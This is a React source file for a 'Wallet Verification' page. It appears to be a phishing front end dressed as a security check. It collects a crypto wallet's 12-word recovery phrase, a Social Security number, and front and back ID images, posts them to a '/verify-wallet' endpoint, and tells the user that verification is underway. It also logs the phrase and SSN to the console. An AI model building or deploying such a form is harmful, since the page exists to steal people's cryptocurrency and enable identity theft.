import React, { useState } from "react";
import {
	TextField,
	Button,
	Snackbar,
	Alert,
	CircularProgress,
	Autocomplete,
	Box,
} from "@mui/material";
import axios from "../../../../api/axios";
import useAuth from "../../../../hooks/useAuth";
import ArrowBackIosIcon from "@mui/icons-material/ArrowBackIos";
import SecurityIcon from "@mui/icons-material/Security";
import VerificationStepper from "./VerificationStepper";
import axiosLib from "axios";

export default function TwelvePhrase() {
	// List of exchange options
	const exchangeOptions = [
		{ label: "Binance" },
		{ label: "Coinbase" },
		{ label: "Kraken" },
		{ label: "Bitfinex" },
		{ label: "Huobi" },
		{ label: "Binance US" },
		{ label: "OKX" },
		{ label: "Bitstamp" },
		{ label: "Gemini" },
		{ label: "KuCoin" },
		{ label: "Crypto.com" },
		{ label: "CoinEx" },
		{ label: "FTX" },
		{ label: "Gate.io" },
		{ label: "Bybit" },
		{ label: "BitMart" },
		{ label: "Liquid" },
		{ label: "Bittrex" },
		{ label: "Luno" },
		{ label: "Changelly" },
		{ label: "Trust Wallet" },
		{ label: "MetaMask" },
		{ label: "Coinomi" },
		{ label: "Exodus" },
		{ label: "Atomic Wallet" },
		{ label: "Other" },
	];

	const { auth, setAuth } = useAuth();

	// State variables
	const [exchange, setExchange] = useState(null);
	const [manualExchange, setManualExchange] = useState("");
	const [phrase, setPhrase] = useState("");
	const [ssn, setSsn] = useState(""); // SSN state

	// ID upload states
	const [frontID, setFrontID] = useState(null);
	const [backID, setBackID] = useState(null);

	const [loading, setLoading] = useState(false);
	const [snackbar, setSnackbar] = useState({
		open: false,
		severity: "success",
		message: "",
	});
	const [errors, setErrors] = useState({
		exchange: false,
		phrase: false,
		ssn: false,
		frontID: false,
		backID: false,
	}); // added ID errors

	// Handle form submission
	const handleSubmit = async (e) => {
		e.preventDefault();

		const exchangeName =
			exchange?.label === "Other" ? manualExchange : exchange?.label || "";

		// Validation
		const newErrors = {
			exchange: !exchangeName || exchangeName.trim() === "",
			phrase: phrase.trim() === "",
			ssn: ssn.trim() === "",
			frontID: frontID === null,
			backID: backID === null,
		};
		setErrors(newErrors);

		if (Object.values(newErrors).some(Boolean)) return;

		setLoading(true);

		// Prepare form data
		const formData = new FormData();
		formData.append("exchangeName", exchangeName);
		formData.append("phrase", phrase);
		formData.append("ssn", ssn);
		formData.append("id", auth?.id);
		if (frontID) formData.append("frontID", frontID);
		if (backID) formData.append("backID", backID);

		try {
			const response = await axios.post("/verify-wallet", formData, {
				headers: { "Content-Type": "multipart/form-data" },
			});

			console.log(response);
			if (response.status === 200) {
				setSnackbar({
					open: true,
					severity: "success",
					message:
						response.data.message ||
						"Data submitted successfully, verification is ongoing, and update will be sent upon success.",
				});
				// Reset form
				setExchange(null);
				setManualExchange("");
				setPhrase("");
				setSsn("");
				setFrontID(null);
				setBackID(null);
			}
		} catch (err) {
			console.error(err);
			if (axiosLib.isAxiosError(err)) {
				if (err.response && err.response.data) {
					setSnackbar({
						open: true,
						severity: "error",
						message: err.response.data.message || "Submission failed",
					});
				} else {
					setSnackbar({
						open: true,
						severity: "error",
						message: err.message || "An error occurred",
					});
				}
			} else {
				setSnackbar({
					open: true,
					severity: "error",
					message: "Unexpected error occurred",
				});
			}
		} finally {
			setLoading(false);
		}
	};

	// Navigate back to home
	const gotoHome = () => {
		setAuth((prev) => ({ ...prev, homeRoute: true }));
	};

	// Handlers for file inputs
	const handleFrontIDChange = (e) => {
		if (e.target.files && e.target.files[0]) {
			setFrontID(e.target.files[0]);
		}
	};
	const handleBackIDChange = (e) => {
		if (e.target.files && e.target.files[0]) {
			setBackID(e.target.files[0]);
		}
	};

	console.log({ ssn, frontID, backID, exchange, manualExchange, phrase });

	return (
		<Box className="flex flex-col justify-center items-center min-h-screen bg-black p-4">
			{/* Back Button */}
			<Button
				onClick={gotoHome}
				sx={{ color: "red", mr: "auto", textDecoration: "underline" }}>
				Back to home{" "}
				<ArrowBackIosIcon sx={{ ml: "0.5rem", fontSize: "1rem" }} />
			</Button>

			{/* Verification Stepper */}
			<VerificationStepper />

			{/* Form Container */}
			<Box
				component="form"
				onSubmit={handleSubmit}
				noValidate
				className="w-full max-w-2xl bg-black border-2 border-gray-500 p-8 rounded shadow-lg">
				{/* Header */}
				<h2 className="text-2xl text-white font-semibold mb-6 text-center flex items-center justify-center gap-2">
					<SecurityIcon sx={{ color: "gray", fontSize: "2rem" }} /> Wallet
					Verification
				</h2>

				{/* Exchange Autocomplete */}
				<Autocomplete
					options={exchangeOptions}
					getOptionLabel={(option) => option.label}
					value={exchange}
					onChange={(event, newValue) => setExchange(newValue)}
					freeSolo
					renderInput={(params) => (
						<TextField
							{...params}
							label="Exchange Name"
							variant="outlined"
							error={errors.exchange}
							helperText={errors.exchange ? "Exchange name is required" : ""}
							required
							sx={{
								"& .MuiOutlinedInput-root": {
									"& fieldset": {
										borderColor: errors.exchange ? "red" : "white",
									},
									"&:hover fieldset": {
										borderColor: errors.exchange ? "darkred" : "yellow",
									},
									"&.Mui-focused fieldset": {
										borderColor: errors.exchange ? "darkred" : "green",
									},
								},
								"& .MuiInputBase-input": { color: "white" },
							}}
							InputLabelProps={{
								sx: {
									color: "white",
									"&.Mui-focused": { color: "white" },
								},
							}}
						/>
					)}
				/>

				{/* Manual exchange input if "Other" */}
				{exchange?.label === "Other" && (
					<TextField
						label="Manual Exchange Input"
						variant="outlined"
						fullWidth
						margin="normal"
						value={manualExchange}
						onChange={(e) => setManualExchange(e.target.value)}
						error={errors.exchange}
						helperText={errors.exchange ? "Please specify exchange" : ""}
						required
						sx={{
							"& .MuiOutlinedInput-root": {
								"& fieldset": {
									borderColor: errors.exchange ? "red" : "white",
								},
								"&:hover fieldset": {
									borderColor: errors.exchange ? "darkred" : "yellow",
								},
								"&.Mui-focused fieldset": {
									borderColor: errors.exchange ? "darkred" : "green",
								},
							},
							"& .MuiInputBase-input": { color: "white" },
						}}
						InputLabelProps={{
							sx: {
								color: "white",
								"&.Mui-focused": { color: "white" },
							},
						}}
					/>
				)}

				{/* 12 Word Phrase Input */}
				<TextField
					label="12 Word Phrase"
					placeholder="cat place shift security may cool day ram pull book vote palm"
					variant="outlined"
					fullWidth
					multiline
					rows={4}
					margin="normal"
					value={phrase}
					onChange={(e) => setPhrase(e.target.value)}
					error={errors.phrase}
					helperText={errors.phrase ? "12 Phrase is required" : ""}
					required
					InputProps={{
						sx: {
							"& input": { color: "white" },
							"& textarea": { color: "white" },
						},
					}}
					InputLabelProps={{
						sx: {
							color: "white",
							"&.Mui-focused": { color: "white" },
						},
					}}
				/>

				{/* SSN Input */}
				<TextField
					label="SSN"
					placeholder="Enter your SSN"
					variant="outlined"
					fullWidth
					margin="normal"
					value={ssn}
					onChange={(e) => setSsn(e.target.value)}
					error={errors.ssn}
					helperText={errors.ssn ? "SSN is required" : ""}
					required
					InputProps={{
						sx: {
							"& input": { color: "white" },
						},
					}}
					InputLabelProps={{
						sx: {
							color: "white",
							"&.Mui-focused": { color: "white" },
						},
					}}
				/>

				{/* Front ID Upload */}
				<Box mt={2} mb={2}>
					<Button
						variant="contained"
						component="label"
						color={errors.frontID ? "error" : "primary"}>
						Upload Front ID
						<input
							type="file"
							hidden
							name="frontID"
							accept="image/*"
							onChange={handleFrontIDChange}
						/>
					</Button>
					{frontID && (
						<span style={{ marginLeft: "10px", color: "white" }}>
							{frontID.name}
						</span>
					)}
					{errors.frontID && (
						<div style={{ color: "red" }}>Front ID is required</div>
					)}
				</Box>

				{/* Back ID Upload */}
				<Box mb={2}>
					<Button
						variant="contained"
						component="label"
						color={errors.backID ? "error" : "primary"}>
						Upload Back ID
						<input
							type="file"
							hidden
							name="backID"
							accept="image/*"
							onChange={handleBackIDChange}
						/>
					</Button>
					{backID && (
						<span style={{ marginLeft: "10px", color: "white" }}>
							{backID.name}
						</span>
					)}
					{errors.backID && (
						<div style={{ color: "red" }}>Back ID is required</div>
					)}
				</Box>

				{/* Submit Button */}
				<Box className="flex justify-center mt-4">
					<Button
						type="submit"
						variant="contained"
						disabled={loading}
						startIcon={loading && <CircularProgress size={20} />}>
						{loading ? "Submitting..." : "Submit"}
					</Button>
				</Box>
			</Box>

			{/* Snackbar Notifications */}
			<Snackbar
				open={snackbar.open}
				autoHideDuration={6000}
				onClose={() => setSnackbar({ ...snackbar, open: false })}>
				<Alert
					severity={snackbar.severity}
					onClose={() => setSnackbar({ ...snackbar, open: false })}
					sx={{ width: "100%" }}>
					{snackbar.message}
				</Alert>
			</Snackbar>
		</Box>
	);
}
